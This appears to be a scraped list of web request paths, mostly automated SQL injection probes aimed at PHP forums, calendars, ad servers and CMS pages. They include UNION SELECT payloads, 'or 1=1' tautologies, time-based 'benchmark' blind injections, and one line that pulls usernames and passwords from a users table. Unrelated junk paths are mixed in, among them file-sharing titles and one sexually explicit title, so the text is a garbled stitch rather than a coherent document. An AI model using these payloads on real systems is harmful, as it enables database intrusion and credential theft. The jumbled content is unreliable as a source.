/cacti/event_view.php?eid=34 union select 1564762658

/examples/jsp/cal/forum.php3?id_article=1&id_forum=-1/**/union/**/select 731802903--

/main.php?logout=1 and 1=1

/default.asp?layout=1 order by 12

/examples/jsp/sessions/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1237270354--

/examples/jsp/sessions/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1874553585 --

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/examples/jsp/jsp2/jspx/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 --

/examples/servlets/servlet/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/error/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1865041936--

/examples/jsp/num/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1078959872 --

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/java card tm platform benchmark/

/examples/jsp/jsp2/el/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/examples/jsp/sessions/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/phpmyadmin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,368612312108,4,5,6,7,8,9,10,11--

/examples/jsp/jsp2/jspx/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/manager/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/num/forum.php?id_article=1&id_forum=-1/**/union/**/select 2016083800--

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/num/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1548065556--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,717488689809,4,5,6,7,8,9,10,11--

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,678527169166,4,5,6,7,8,9,10,11--

/jeff wayne - war of the worlds  disc 1 and 2/

/en-us/account/forum.php?forum=-1 union select null,123456,null,null,null,null--

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 120291996--

/zina teen in threesome - part 2 and 4/

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1415485766,1622819751,1,1,1,1,1--&blogid=1

/benchmark-1/

/en-us/account/forum.php?id_article=1&id_forum=-1/**/union/**/select 124305483--

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/event_view.php?eid=34 union select 664528678

/examples/jsp/jsp2/el/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,796215215572,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010406,1,837815122--

/examples/jsp/error/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 875486487--

/event_view.php?eid=34 union select 1193351483

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/manager/event_view.php?eid=34 union select 244932351

/examples/jsp/cal/www/delivery/ac.php?bannerid=-237+or+1=1

/examples/jsp/error/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/manager/forum.php?id_article=1&id_forum=-1/**/union/**/select 371061435--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,979509512928,4,5,6,7,8,9,10,11--

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/error/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1566327529--

/examples/jsp/sessions/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1053097247--

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332008331

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 362784712,2,1572590489,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/cal/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/cacti/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,2078159389--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 663157054,2,24321334,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/jsp2/el/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/cal/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1685838794 --

/xxx 1 and 2 dvdr/

/www/delivery/ac.php?bannerid=-718+or+1=1

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010398,1,1,1,1,1,1,1--&blogid=1

/phpmyadmin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,2060887544--

/recordings/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 --

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1825418350--

/examples/jsp/cal/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/phpmyadmin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201

/cacti/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--&blogid=1

/category.php?cat=cat=-1/**/union/**/all/**/select/**/1,concat(0x3b,0x3a,username,0x3a,0x3a,password,0x3a,0x3b),3,4,5/**/from/**/users/*

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1172490314--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 549706504--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 680478094--

/phpmyadmin/www/delivery/ac.php?bannerid=-180+or+1=1

/examples/jsp/error/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/event_view.php?eid=34 union select 147408731

/cgi-bin/event_view.php?eid=34 union select 1062821918

/recordings/forum.php3?id_article=1&id_forum=-1/**/union/**/select 911835446--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 913274528--

/cgi-bin/www/delivery/ac.php?bannerid=-876+or+1=1

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,357504557199,4,5,6,7,8,9,10,11--

/examples/jsp/sessions/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/recession and 9-11 presentation/

/benchmark/

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--&blogid=1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/phpmyadmin/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1638280388 --

/cgi-bin/www/delivery/ac.php?bannerid=-537+or+1=1

/examples/jsp/sessions/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/cacti/event_view.php?eid=34 union select 2137460731

/cgi-bin/www/delivery/ac.php?bannerid=-525+or+1=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332008335,1,1416741615--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,440206325388,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/manager/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1991093983--

/examples/jsp/num/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,416276020,64888377,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1

/phpmyadmin/forum.php?id_article=1&id_forum=-1/**/union/**/select 578823180--

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1461801666,2,718923871,4,5,6,7,8,9,0,1,2,3 --

/benchmark/

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908730,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331908875,1409941828 --

/en-us/account/disp_album.php?id_album=0+or+1=1

/examples/jsp/jsp2/el/forum.php?id_article=1&id_forum=-1/**/union/**/select 147741334--

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,965092418962,4,5,6,7,8,9,10,11--

/examples/jsp/jsp2/el/forum.php?id_article=1&id_forum=-1/**/union/**/select 141627881--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908887,4,5

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1984048408--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/jei00-benchmark/

/cacti/forum.php3?id_article=1&id_forum=-1/**/union/**/select 80658061--

/examples/jsp/colors/forum.php3?id_article=1&id_forum=-1/**/union/**/select 470283318--

/examples/servlets/servlet/forum.php?id_article=1&id_forum=-1/**/union/**/select 1685821347--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,212219772136,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/num/www/delivery/ac.php?bannerid=-795+or+1=1

/examples/jsp/cal/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1476113068--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1588288397--

/category_list.php?category_id=-1/**/union/**/select/**/teststring/*

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 7421223--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1990709357,1464629176,1,1,1,1,1--&blogid=1

/index.php?action=information&informationid=1 and generate_error=error

/examples/servlets/servlet/www/delivery/ac.php?bannerid=-654+or+1=1

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331904237,471425159 --

/star wars movies all but 2 and 3/

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1126849470,1437216392,1,1,1,1,1--&blogid=1

/main.php?logout=(4668-benchmark(1,0x53454c454354204e554c4c)+18872)

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010406,1,2089441840--

/examples/jsp/jsp2/jspx/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/cacti/forum.php?id_article=1&id_forum=-1/**/union/**/select 1642992017--

/disp_album.php?id_album=0+or+1=1

/cacti/spt--forumtopics.php?forumid=-9 union select null,null,null,1331909422,4,5

/examples/jsp/cal/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/www/delivery/ac.php?bannerid=-95+or+1=1

/examples/jsp/jsp2/el/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1750812950--

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331905207,2129599317 --

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cacti/www/delivery/ac.php?bannerid=-769+or+1=1

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358

/principle and 2  hot swedish exchange students-blondes must  lick cum out of eachothers ass to graduate/

/and 1 movies/

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332009306

/examples/jsp/colors/forum.php?id_article=1&id_forum=-1/**/union/**/select 1255368036--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/num/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/latest snes emu - donkey kong country 1 2 and 3 plus zbattle for online play/

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/jsp2/el/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1872224115--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1789723139--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--&blogid=1

/cgi-bin/www/delivery/ac.php?bannerid=-462+or+1=1

/index.php?act=sm_window&page=event&day=-1 union select 1,1331919007,1629556233 --

/forumtopicdetails.php?topicid=11111111 union select * from eronatedinexistenttable

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,321066300--

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1565087873--

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331923203,996094362 --

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/cal/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,284168759320,4,5,6,7,8,9,10,11--

/en-us/account/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--&blogid=1

/cacti/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--&blogid=1

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/error/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908740,4,5

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010411,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/event_view.php?eid=34 union select 770694655

/examples/jsp/jsp2/el/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1459316958--

/top.php?stuff=2040844887 and 1=1

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,416276020,64888377,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 996551295,2,294567145,4,5,6,7,8,9,0,1,2,3 --

/manager/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/colors/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1315311982--

/phpmyadmin/forum.php?forum=-1 union select null,123456,null,null,null,null--

/index.php?act=sm_window&page=event&day=-1 union select 1,1332008334,1103218371 --

/event_view.php?eid=34 union select 1759176067

/phpmyadmin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/examples/jsp/checkbox/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1015243102--

/phpmyadmin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 545349188--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919223,4,5

/top.php?stuff=(47154-benchmark(1,0x53454c454354204e554c4c)+20662)

/manager/event_view.php?eid=34 union select 602427762

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,437646512028,4,5,6,7,8,9,10,11--

/examples/jsp/colors/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,595209753--

/examples/servlets/servlet/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/en-us/account/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909369,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/colors/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,336224202143,4,5,6,7,8,9,10,11--

/cacti/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331905232,1,480606773--

/examples/jsp/colors/www/delivery/ac.php?bannerid=-384+or+1=1

/examples/servlets/servlet/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/servlets/servlet/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cacti/forum.php?forum=-1 union select null,123456,null,null,null,null--

/examples/jsp/colors/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1970927033--

/am idol 4x07 and 4x08/

/event_view.php?eid=34 union select 1003421396

/examples/jsp/checkbox/forum.php?id_article=1&id_forum=-1/**/union/**/select 594117015--

/examples/servlets/servlet/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1603850511--

/examples/jsp/jsp2/jspx/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1161509000--

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919223,4,5

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1499844381--

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,156031436 --

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010411,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 385821988--

/manager/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/en-us/account/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,177966532--

/benchmark-tool/

/examples/jsp/checkbox/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/www/delivery/ac.php?bannerid=-210+or+1=1

/manager/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/examples/jsp/colors/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/chuzzle deluxe  and 16 others arcades pc game from www/

/manager/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/jsp2/jspx/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332009306

/cgi-bin/event_view.php?eid=34 union select 162735788

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/event_view.php?eid=34 union select 1755540068

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 105983875--

/examples/jsp/jsp2/jspx/forum.php?id_article=1&id_forum=-1/**/union/**/select 29837577--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/colors/event_view.php?eid=34 union select 597814962

/en-us/account/forum.php?id_article=1&id_forum=-1/**/union/**/select 626625853--

/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-371+or+1=1

/examples/jsp/sessions/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1118134181--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/prison tycoon and 15 others arcades pc game from search/

/index.php?act=sm_window&page=event&day=-1 union select 1,1331904237,728989110 --

/examples/jsp/jsp2/jspx/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/examples/jsp/jsp2/jspx/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/cacti/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904243,4,5

/cgi-bin/event_view.php?eid=34 union select 997591418

/libevent-benchmark/

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904231,1,1,1,1,1,1,1--&blogid=1

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1098031750--

/examples/servlets/servlet/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/en-us/account/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170

/cgi-bin/event_view.php?eid=34 union select 1788343965

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331908735,238390503 --

/examples/jsp/checkbox/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/examples/jsp/error/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,409818620--

/examples/jsp/checkbox/www/delivery/ac.php?bannerid=-996+or+1=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1642641291 --

/examples/servlets/servlet/forum.php3?id_article=1&id_forum=-1/**/union/**/select 828356873--

/www/delivery/ac.php?bannerid=-458+or+1=1

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010419,4,5

/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 99763205--

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331909422,4,5

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908729

/eventdisplay.php?id=-999 union select 111222,222,333111

/examples/jsp/checkbox/event_view.php?eid=34 union select 707923775

/recordings/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/business continuity report benchmark study/

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/error/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1820862398 --

/examples/jsp/cal/event_view.php?eid=34 union select 1029351449

/en-us/account/forum.php3?id_article=1&id_forum=-1/**/union/**/select 494785074--

/cgi-bin/event_view.php?eid=34 union select 158644160

/examples/jsp/error/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/phpmyadmin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1033279589--

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,1586721588--

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 --

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1736356466--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--&blogid=1

/cacti/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2046247877--

/groove coverage - 7 years and 50 days/

/en-us/account/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--&blogid=1

/examples/jsp/error/www/delivery/ac.php?bannerid=-616+or+1=1

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,776831339,588291065,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,487991931578,4,5,6,7,8,9,10,11--

/examples/jsp/cal/www/delivery/ac.php?bannerid=-93+or+1=1

/en-us/account/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358

/examples/jsp/sessions/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1662680530--

/examples/jsp/error/event_view.php?eid=34 union select 2082146548

/cacti/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,973928090967,4,5,6,7,8,9,10,11--

/event_view.php?eid=34 union select 979222975

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/error/www/delivery/ac.php?bannerid=-912+or+1=1

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,313307003019,4,5,6,7,8,9,10,11--

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 --

/phpmyadmin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,434498019574,4,5,6,7,8,9,10,11--

/examples/jsp/num/event_view.php?eid=34 union select 627500019

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/en-us/account/index.php?act=sm_window&page=event&day=-1 union select 1,1331905207,980330182 --

/examples/jsp/num/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,265533115639,4,5,6,7,8,9,10,11--

/phpmyadmin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 854943738,2,566710091,4,5,6,7,8,9,0,1,2,3 --

